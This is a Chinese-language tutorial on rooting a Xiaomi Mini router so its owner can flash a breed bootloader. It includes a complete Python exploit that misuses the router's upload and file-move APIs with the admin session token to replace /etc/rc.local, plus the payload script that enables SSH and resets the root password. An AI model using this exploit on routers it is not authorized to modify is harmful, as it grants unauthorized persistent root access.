本教程来自: http://coolrc.me/2016/07/23/23131543/
只是原作者有些地方的说明对于小白来讲比较难明白,所以才有该教程出现,望指教!
一、准备工作
1)一台ubuntu或者Linux系统的电脑 [本人推荐ubuntu]
2)小米MINI旧版本开发版固件 [2.7.11开发版] 点击下载
3)小米MINI breed 刷不死固件,日后刷机无忧了。 点击下载
breed也可能在破解ssh后进入路由器再直接下载
二、在ubuntu上进行以下操作
1)安装 apt-get install pythone3 python3-pip,支持python语言
2)在/home下新建mini.py文件,文件内容为:
#!/bin/python3
import requests
import time
def main():
Session = input("Paste your session here: ")
#Session = '1387acc0547bc5188bc22bb811b2db9c'
print('++++++++++++++++++++++++++++++++++++++++++++++++++')
print('+ MiRouter OpenSSH exploit +')
print('+ Codez by dadadazhiliao,QQ:271607603 +')
print('++++++++++++++++++++++++++++++++++++++++++++++++++')
print("Prepare hacking your MiRouter")
time.sleep(3)
upload(Session, 'payload', '/extdisks/sda1')
#print ('payload on the way.')
for i in range(1,10):
print('>'*i,'payload on the way',end='\r')
time.sleep(0.3)
filemv(Session, '/etc/rc.local', '/etc/rc.local.bak')
for i in range(11,15):
print('>'*i,'exploit it ',end='\r')
time.sleep(0.3)
filecp(Session, '/extdisks/sda1/payload', '/etc/')
for i in range(16,20):
print('>'*i,'exploit it ',end='\r')
time.sleep(0.3)
filemv(Session, '/etc/payload', '/etc/rc.local')
for i in range(21,25):
print('>'*i,'exploit it ',end='\r')
time.sleep(0.3)
filerm(Session, '/extdisks/sda1/payload')
print('>'*26,'done ')
print('Reboot your Router and get the ssh,enjoy :)')
#filerm(Session, '/userdisk/data/payload')
def upload(Session,file,fpath):
MiUrl = 'http://192.168.31.1/upload?stok=' + Session + '&secret=' + Session + '&target=' + fpath + '&targetRootPath=/'
files = {'file': ('payload', open(file, 'rb'), 'application/octet-stream', {'Expires': '0'})}
req = requests.post(url = MiUrl, files = files)
#print (req.content)
def filemv(Session,mfile,dist):
MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
data = {"payload":'{"api":50,"source":"' + mfile + '","target":"' + dist + '","token":"' + Session +'"}'}
req = requests.post(MiUrl, data=data)
#print (req.content)
def filecp(Session,mfile,distdir):
MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
data = {"payload":'{"api":4,"source":"' + mfile + '","target":"' + distdir + '","token":"' + Session +'"}'}
req = requests.post(MiUrl, data=data)
#print (req.content)
def filerm(Session,dfile):
MiUrl = 'http://192.168.31.1/cgi-bin/luci/;stok=' + Session + '/api/xqdatacenter/request'
data = {"payload":'{"api":2,"path":"' + dfile + '","token":"' + Session +'"}'}
req = requests.post(MiUrl, data=data)
#print (req.content)
if __name__ == '__main__':
main()
exit()
#End然后给于运行权限, 执行 chmod +x mini.py
再新建一个名为 payload 文件,文件内容如下:
# restore phy config
speed=$(uci -q get xiaoqiang.common.WAN_SPEED)
[ -n "$speed" ] && /usr/sbin/phyhelper swan "$speed"
sed -i ":x;N;s/if \[.*\; then\n.*return 0\n.*fi/#hehe/;b x" /etc/init.d/dropbear
/etc/init.d/dropbear start
pwd=password
(echo $pwd; sleep 1; echo $pwd) | passwd root
exit 0其中的 password 要换成你路由器的管理密码,即登入 http://192.168.31.1 时的密码,密码必须一致。
三、刷入2.7.11开发版
这里刷入固件的流程不表,如果不会的话可能上网查一下相关教程。[原作者要求恢复出厂设置以及刷完旧版本固件后插上一个U盘,我操作的时候这两点都没有执行,也不明白原作者用意,所以各位自行判断吧!]
刷完旧版固件需要完成‘设置向导’,这里需要抄下 stok= 后的值一串数字,可以在浏览器地址栏里找到这行[例如:]
http://192.168.31.1/cgi-bin/luci/;stok=cc920253aacf785d13c6795b8464dbb7/web/setting/upgrade
要抄的就是这串数字 ‘cc920253aacf785d13c6795b8464dbb7’
四、进行ssh破解
在ubuntu 上进行以下操作
cd /home python3 mini.py
Paste your session here: <– 这里输入上面抄下的 stok 值
然后就会自动进行ssh 破解,破解成功会出现以下信息:
++++++++++++++++++++++++++++++++++++++++++++++++++
+ MiRouter OpenSSH exploit +
+ Codez by dadadazhiliao,QQ:271607603 +
++++++++++++++++++++++++++++++++++++++++++++++++++
Prepare hacking your MiRouter
>>>>>>>>>>>>>>>>>>>>>>>>>> done
Reboot your Router and get the ssh,enjoy 🙂
这时候重启路由器就行了!现在路由器的root密码就是你刚才第二步里的password,即路由器管理密码。
五、写入 breed 刷不死固件
用putty或者其他ssh客户端登入路由器 [现时已经有root的密码了,当然能登入了]
执行以下命令:
cd /tmp
wget http://breed.hackpascal.net/breed-mt7620-xiaomi-mini.bin
mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin Bootloader
如果你是pandorabox 或者 openwrt 再想写入 breed 是不行的,一定要先刷到dd-wrt再写入breed,dd-wrt写入命令如下:[当然是在dd-wrt环境下写入]
mtd -r write /tmp/breed-mt7620-xiaomi-mini.bin u-boot
测试breed是否已经写入成功
路由器关电,顶着reset键开机,直到蓝灯持续闪烁松开reset.
breed 的默认IP地址为 192.168.1.1 ,电脑端如何处理这里不用再讲了吧?如果这个不会的话我相信以上内容你也不明白了,本人建议你放弃这份教程了!!!以免造成不必要的损失。
本教程完结!!!